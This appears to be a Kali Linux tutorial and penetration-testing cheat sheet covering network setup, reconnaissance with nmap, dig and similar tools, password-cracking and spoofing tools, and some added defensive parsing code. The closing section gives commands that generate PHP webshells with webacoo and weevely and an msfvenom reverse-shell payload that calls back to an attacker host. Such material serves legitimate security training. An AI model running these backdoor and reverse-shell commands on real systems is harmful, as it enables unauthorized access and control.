Kali Linux introduction and overview
1. Main features of Kali
Kali official website: https://www.kali.org/
Debian-based Linux distribution
Integrates more than 300 penetration testing programs
Supports most wireless network cards
2. Network service configuration
1. Set a fixed IP:
Virtual machine network settings file:
/etc/network/interfaces
2. Temporary IP configuration commands
ifconfig eth0 192.168.43.100 netmask 255.255.255.0 // set the IP address
route add default gw 192.168.43.1 // default gateway route
systemctl restart networking.service // restart networking to restore the configured settings
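As an added example (not from the original post), the persistent equivalent of the temporary commands above written into /etc/network/interfaces, assuming the VM's interface is named eth0 as in those commands:

```text
# /etc/network/interfaces (added example; assumes the VM's interface is eth0)
auto lo
iface lo inet loopback

# static address matching the temporary ifconfig/route commands above;
# "auto eth0" brings the interface up at boot with these settings
auto eth0
iface eth0 inet static
    address 192.168.43.100
    netmask 255.255.255.0
    gateway 192.168.43.1
```

After editing the file, `systemctl restart networking.service` applies it, and the temporary ifconfig/route settings are replaced by these.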
3. The role of the dmesg command:
View wireless network card hardware information and the kernel ring buffer messages
4. Commands to turn network services on and off
You can use either the systemctl or the service command here; the syntax is basically the same. Old versions of Kali may only support the service command.
Common subcommands are:
start // start the service
stop // stop the service
restart // restart the service
5. Commonly used services in Kali
http (apache)
service apache2 start // start
service apache2 stop // stop
service apache2 restart // restart
update-rc.d apache2 defaults // start at boot
mysql
service mysql start // start
service mysql stop // stop
service mysql restart // restart
update-rc.d mysql defaults // start at boot
mysql -u root -p // log in
ssh
service ssh start // start
service ssh stop // stop
service ssh restart // restart
update-rc.d ssh defaults // start at boot
3. System update
Commands
apt-get update
apt-get upgrade
apt-get dist-upgrade
PS: The latest version of Kali, the 2020 release, is not very compatible, and many of the tools I commonly use have been removed. Personally, I do not recommend updating unless you need to.
apt-cache search <package> // search the software repository for a package by name
apt-get install <package> // install the specified package
Penetration testing overview
1. Five testing methodology frameworks
Open Source Security Testing Methodology Manual (OSSTMM)
Information Systems Security Assessment Framework (ISSAF)
Open Web Application Security Project (OWASP)
Web Application Security Consortium Threat Classification (WASC-TC)
Penetration Testing Execution Standard (PTES)
2. The universal penetration testing framework
Scope definition
Information gathering
Target identification
Service enumeration
Vulnerability mapping
Social engineering
Exploitation
Privilege escalation
Access maintenance
Documentation and reporting
Implementation steps of penetration testing
1. Information gathering
Definition and usage of the whois command
whois example.com
This command returns detailed information about the example.com domain: its registrant and contact details.
Official website: https://who.is/
DNS record analysis
1. host
host www.example.com
With no parameters, only the IPv4 address is returned
host -a www.example.com
Add the -a parameter to return all DNS records
2. dig
dig example.com
With no parameters, only the A record address (IPv4) is returned
dig example.com any
Add the any parameter to return all DNS records
3. dnsenum
dnsenum example.com
By default it returns the IP addresses of the host, the name servers and the mail servers.
If you have a dictionary (wordlist), you can use this tool to brute-force subdomains
dnsenum -f dns.txt example.com
4. dmitry
dmitry -iwnse targethost
Perform a whois query
Mine host information from the Netcraft.com website
Search for all possible subdomains
Search for all possible email addresses
dmitry targethost -f -b
Perform a simple port scan (very slow and not easy to use; not recommended)
Routing information
1. tcptraceroute
tcptraceroute example.com
Given that the target web server has TCP port 80 open, the above command obtains the complete route from the local machine to the target host.
PS: easily blocked by firewalls
2. tctrace
tctrace -i eth0 -d example.com
Specify the network card eth0 and obtain the route between this machine and example.com
Target identification
Related post: Commonly used penetration testing tools - target identification
1. ping
ping -c 10 example.com
ping -c 10 192.168.123.256
The -c parameter specifies the number of packets to send (execution count)
The -I parameter specifies the source address or network interface (network card)
-s specifies the packet size (the default is 64 bytes)
2. arping
arping 192.168.56.102 -c 1
Check whether a host on the LAN is online; the -i parameter specifies the network card and the -c parameter specifies the count
3. fping
fping 192.168.1.1 192.168.1.100 192.168.1.107
Check whether the three hosts are online
fping -g 192.168.56.0/24
Probe the entire network segment
fping -r 1 -g 192.168.1.1 192.168.1.10
The -r parameter specifies the number of retries (the default is 3)
fping -s www.baidu.com www.cqcet.edu.cn www.csdn.net
The -s parameter shows statistics for multiple targets
4. hping3
Main purposes
Test firewall rules
Test intrusion detection systems (IDS)
Test for security vulnerabilities in the TCP/IP stack
hping3 -0 192.168.56.101 // send raw IP packets (--rawip)
hping3 -1 192.168.56.101 // send ICMP packets (--icmp)
hping3 -2 192.168.56.101 // send UDP packets (--udp)
hping3 -8 192.168.56.101 // enter scan mode (--scan)
hping3 -9 192.168.56.101 // enter listen mode (--listen)
5. nping
nping --tcp-connect -c 1 -p 22 192.168.56.102 // basic TCP connect mode
nping --tcp -c 1 -p 22 192.168.6.102 // TCP mode
nping --udp -c 1 -p 22 192.168.6.102 // UDP mode
nping --icmp -c 1 -p 22 192.168.6.102 // ICMP mode (the default mode)
nping --arp -c 1 -p 22 192.168.6.102 // ARP/RARP mode
nping --tr -c 1 -p 22 192.168.6.102 // traceroute mode
6. nbtscan
nbtscan 192.168.1.1-254
Look up the NetBIOS name of each host on the LAN
nbtscan -hv 192.168.1.1-254
The -hv parameters show which services are running
7. uniscan
Operating system identification
1. p0f
Can identify the following hosts:
Machines connecting to your host (SYN mode, the default mode)
Machines your host connects to (SYN+ACK mode)
Machines your host cannot connect to (RST+ mode)
Machines whose network traffic can be observed
p0f -f /etc/p0f/p0f.fp -o p0f.log
Then open port 80 for the target machine to connect to
2. nmap
nmap -O 192.168.43.89 // operating system identification
The recognition rate is not very high
Service enumeration
Related post: Commonly used penetration testing tools - amap service enumeration
Network scanning
1. nmap
Main functions
Host discovery
Port scanning
Service/version detection
Operating system detection
Network routing
Nmap Scripting Engine
Scan options
nmap -sT 192.168.43.89 // TCP connect scan
nmap -sS 192.168.43.89 // SYN scan
nmap -sN 192.168.43.89 // TCP NULL scan
nmap -sF 192.168.43.89 // TCP FIN scan
nmap -sX 192.168.43.89 // TCP Xmas scan
nmap -sM 192.168.43.89 // TCP Maimon scan
nmap -sA 192.168.43.89 // TCP ACK scan
nmap -sW 192.168.43.89 // TCP window scan
nmap -sI 192.168.43.89 // TCP idle scan
Target port options
-p <port range> : scan only the specified ports
-F (fast scan) : scan only the 100 most common ports
-r (sequential scan) : scan ports in ascending order instead of in random order
--top-ports <1 or greater> : scan the N highest-ranked ports in nmap-services
Output options
Interactive (screen) output
Normal output (-oN) : does not show runtime information and warnings
XML output (-oX) : the generated XML file can be converted into an HTML page, parsed by graphical front ends, and easily imported into a database
Grepable output (-oG) : generates a file for grep to process
Timing options
-T specifies the timing template
Common options
nmap -sV 192.168.43.89 -p 22 // service version detection
nmap -O 192.168.43.89 // operating system detection
nmap -Pn 192.168.43.89 // skip host discovery
nmap -A 192.168.43.89 // comprehensive (aggressive) scan
Script engine
-sC or --script=default : run the default category of NSE scripts
--script <filename>|<category>|<directory> : run the scripts named by file, category or directory
--script-args <args> : pass arguments to the scripts
Evasion and timing options
-f : use small (fragmented) packets
--mtu : adjust the packet (fragment) size
-D : specify decoy IPs
--source-port <portnumber> or -g : spoof the source port
--data-length : change the default length of the packets sent
--max-parallelism : limit the maximum number of probes nmap sends in parallel
--scan-delay <time> : control the interval between probe packets
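The grepable (-oG) output mentioned above is the easiest nmap format to post-process. The following is an added example, not code from the original post: it parses a constructed -oG sample into per-host port lists and flags open ports that are not on an allow-list, which is how a defender turns a scan into an inventory check.

```python
import re

# Constructed sample of nmap grepable (-oG) output; not from a real scan.
# Fields are tab-separated "Key: value" pairs; the Ports field is a comma-separated
# list of port/state/proto/owner/service/rpc/version/ entries (nmap writes any '/'
# inside the version string as '|', so splitting on '/' is safe).
SAMPLE_GNMAP = """\
# Nmap 7.80 scan initiated as: nmap -sV -oG scan.gnmap 192.168.43.0/24
Host: 192.168.43.89 ()\tStatus: Up
Host: 192.168.43.89 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.9p1 Debian 10 (protocol 2.0)/, 80/open/tcp//http//Apache httpd 2.4.38/, 3306/filtered/tcp//mysql///\tIgnored State: closed (997)
Host: 192.168.43.90 (printer.lan)\tPorts: 9100/open/tcp//jetdirect///\tIgnored State: closed (999)
# Nmap done -- 256 IP addresses (2 hosts up) scanned in 12.34 seconds
"""

HOST_RE = re.compile(r"^Host:\s+(\S+)\s+\(([^)]*)\)")


def parse_gnmap(text):
    """Return {ip: {"hostname": str, "ports": [(port, proto, state, service, version), ...]}}."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue  # '# Nmap ...' header and footer lines carry no host data
        fields = dict(field.partition(": ")[::2] for field in line.split("\t"))
        ip, hostname = HOST_RE.match(line).groups()
        entry = hosts.setdefault(ip, {"hostname": hostname, "ports": []})
        for item in fields.get("Ports", "").split(", "):
            if not item:
                continue  # 'Status: Up' lines have no Ports field
            port, state, proto, _owner, service, _rpc, version = item.strip().split("/")[:7]
            entry["ports"].append((int(port), proto, state, service, version.replace("|", "/")))
    return hosts


def open_ports(hosts):
    """Flatten to {ip: sorted open port numbers}; handy for an inventory or a diff between two scans."""
    return {ip: sorted(p for p, _, st, _, _ in h["ports"] if st == "open") for ip, h in hosts.items()}


def unexpected_open(hosts, allowed):
    """List (ip, port, service) for open ports missing from the allow-list {ip: {ports}}."""
    findings = []
    for ip, h in hosts.items():
        for port, _proto, state, service, _version in h["ports"]:
            if state == "open" and port not in allowed.get(ip, set()):
                findings.append((ip, port, service))
    return findings


if __name__ == "__main__":
    parsed = parse_gnmap(SAMPLE_GNMAP)
    print(open_ports(parsed))
    print(unexpected_open(parsed, {"192.168.43.89": {22}}))
```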
2. Unicornscan
-m U scan using the UDP protocol
-m T scan using the TCP protocol
-Iv show detailed (immediate, verbose) output
-r adjust the packet sending rate
unicornscan -m U -Iv 192.168.43.89:1-65535 -r 10000
unicornscan -m T -Iv 192.168.43.89:1-65535 -r 10000
SMB enumeration
1. nbtscan
nbtscan 192.168.56.1-254
Look up the NetBIOS name of each host in the 192.168.56.0 network
nbtscan -hv 192.168.56.102
View the network services of the host 192.168.56.102
SNMP enumeration
Related post: Commonly used penetration testing tools - ADMsnmp for SNMP analysis
1. onesixtyone
onesixtyone 192.168.56.102
Find the SNMP community strings the host accepts
onesixtyone -d 192.168.56.102
Perform a more detailed scan
2. snmpcheck
snmpcheck -t 192.168.56.102
Collect information about the SNMP device
VPN enumeration
1. ike-scan
ike-scan -M -A -Pike-hashkey 192.168.0.10
Discover, fingerprint and test an IPsec VPN server
-M splits the decoded payload across multiple lines for easier reading
-A uses IKE aggressive mode
-P saves the aggressive-mode hash and pre-shared-key material to a file
Vulnerability mapping
1. Types of vulnerabilities
Local vulnerabilities
Remote vulnerabilities
2. Vulnerability scanners
OpenVAS
Cisco analysis tools
Cisco Auditing Tool (CAT)
Run:
cd /usr/share/
CAT --help
Options:
-h specifies the host name (use this option when scanning a single host)
-w specifies the dictionary file (for guessing the community string)
-a specifies the password list (for exhausting passwords)
-i [ioshist] (checks for IOS bugs that have appeared in history)
Cisco Global Exploiter (CGE)
Run:
cd /usr/bin/
cge.pl
Command:
cge.pl 10.200.213.25 3
3. Fuzz analysis tools
BED (to be continued)
JBroFuzz (to be continued)
3. SMB analysis tools
Impacket Samrdump
(to be continued)
4. SNMP analysis tools
SNMP Walk
(to be continued)
5. Web application analysis tools
Database assessment tools
DBPwAudit (to be continued)
sqlmap
SQL Ninja (to be continued)
Web application assessment tools
Burp Suite (to be continued)
Paros Proxy (to be continued)
W3af (to be continued)
WafW00f (to be continued)
Webscarab (to be continued)
Exploitation
MSFConsole
MSFConsole: commonly used modules
MSFConsole: post-exploitation modules
Privilege escalation
1. Classification
Vertical privilege escalation
Horizontal privilege escalation
2. Exploiting local vulnerabilities
3. Password attacks
Knowledge-based
Based on all
Feature-based
Offline attacks
Online attacks
hash-identifier identifies the hash algorithm; crack passwords only with the hash algorithm actually used by the system under test
Hashcat: multi-threaded password cracking that makes full use of the CPU
RainbowCrack: cracks with rainbow tables, trading space for time
samdump2: dumps the password hashes of Windows system accounts for cracking
John: cracks hashes, and is particularly good at the DES crypt type
Johnny: the graphical version of John
Crunch: creates password dictionaries that can be used for brute force cracking
Ophcrack: cracks LM / NTLM hashes based on rainbow tables
Online cracking tools
CeWL: a crawler-mode tool that collects words from a specified URL and puts them into a dictionary to improve the hit rate of brute forcing
Hydra: cracks passwords online
Medusa: cracks passwords online
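The point made above about hash-identifier, that a hash string only narrows the algorithm down and that the tool must be told the format the system really uses, is illustrated by the following added example (not code from the original post or from hash-identifier). It classifies hashes by crypt-format prefix or by hex length, reports when the guess is ambiguous, and audits a constructed user:hash file for entries stored as unsalted fast digests, which is the storage weakness rainbow tables exploit.

```python
import hashlib
import re

# Modular crypt format prefixes (the layout used in /etc/shadow): the prefix names the
# algorithm unambiguously, and the format carries a salt and an iteration count.
CRYPT_PREFIXES = {"$1$": "MD5-crypt", "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
                  "$5$": "SHA-256-crypt", "$6$": "SHA-512-crypt", "$y$": "yescrypt"}

# Bare hex digests: the length only narrows the algorithm down; it cannot tell MD5 from NTLM.
HEX_CANDIDATES = {32: ["MD5", "NTLM", "MD4", "LM"], 40: ["SHA-1", "RIPEMD-160"],
                  56: ["SHA-224"], 64: ["SHA-256", "SHA3-256"], 96: ["SHA-384"],
                  128: ["SHA-512", "SHA3-512", "Whirlpool"]}
HEX_RE = re.compile(r"^[0-9a-fA-F]+$")

# Constructed sample in the user:hash layout that john and hashcat accept; not real credentials.
SAMPLE_HASHES = "\n".join([
    "# constructed sample",
    "alice:" + hashlib.md5(b"example-only").hexdigest(),
    "bob:" + hashlib.sha256(b"example-only").hexdigest(),
    "carol:$6$Yx7Kp9Qa$" + "A" * 86,   # shape of a SHA-512-crypt entry
    "dave:$2b$12$" + "B" * 53,          # shape of a bcrypt entry
    "erin:" + hashlib.sha1(b"example-only").hexdigest(),
])


def identify_hash(h):
    """Classify one hash string by crypt prefix first, then by hex length/charset.
    Returns the candidate algorithms, whether that guess is ambiguous, and whether
    the format is salted and iterated (i.e. designed for password storage at all)."""
    h = h.strip()
    for prefix, name in CRYPT_PREFIXES.items():
        if h.startswith(prefix):
            return {"candidates": [name], "ambiguous": False, "salted": True}
    if HEX_RE.match(h) and len(h) in HEX_CANDIDATES:
        cands = HEX_CANDIDATES[len(h)]
        return {"candidates": cands, "ambiguous": len(cands) > 1, "salted": False}
    return {"candidates": [], "ambiguous": True, "salted": False}


def audit_hash_file(text):
    """Flag users whose hash is an unsalted fast digest: precomputed rainbow tables
    (RainbowCrack, Ophcrack) and GPU cracking (hashcat) work precisely on those."""
    findings = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        user, _, hash_value = line.partition(":")
        info = identify_hash(hash_value)
        if not info["salted"]:
            findings.append((user, info["candidates"]))
    return findings
```

Running `audit_hash_file(SAMPLE_HASHES)` flags alice, bob and erin; carol and dave pass because their formats are salted and iterated.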
4. Network spoofing tools
Network sniffing and network spoofing
DNSchef
Acts as the DNS server for the tested host and resolves domain names to an IP controlled by the attacker, so that the attacker's host plays the role of the real server
arpspoof
Utility for assisting network monitoring on a switched network
Ettercap
Tool for man-in-the-middle attacks on a LAN
5. Network sniffers
Dsniff
tcpdump
Wireshark
Access maintenance
1. Operating system backdoors
Cymothoa
Intersect
Meterpreter
2. Tunneling tools
dns2tcp
iodine
ncat
proxychains
ptunnel
socat
sslh
stunnel4
3. Creating a web backdoor
WeBaCoo
Options:
-g generate the backdoor code
-f PHP function used by the backdoor: system (default) / shell_exec / exec / passthru / popen
-o output file name for the generated backdoor program
Example:
webacoo -g -o test.php // generate a PHP backdoor with the default configuration
webacoo -t -u http://192.168.43.89/test.php
Connect to the backdoor
weevely
Generate an obfuscated PHP backdoor and save it as display.php
weevely generate password display.php
weevely http://192.168.43.89/display.php password
Access the webshell on the host under test
PHP Meterpreter
-p specifies the payload php/meterpreter/reverse_tcp
-f sets the output format
LHOST is the attacker's address
LPORT is the attacker's port
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.180 LPORT=1234 -f raw > a.php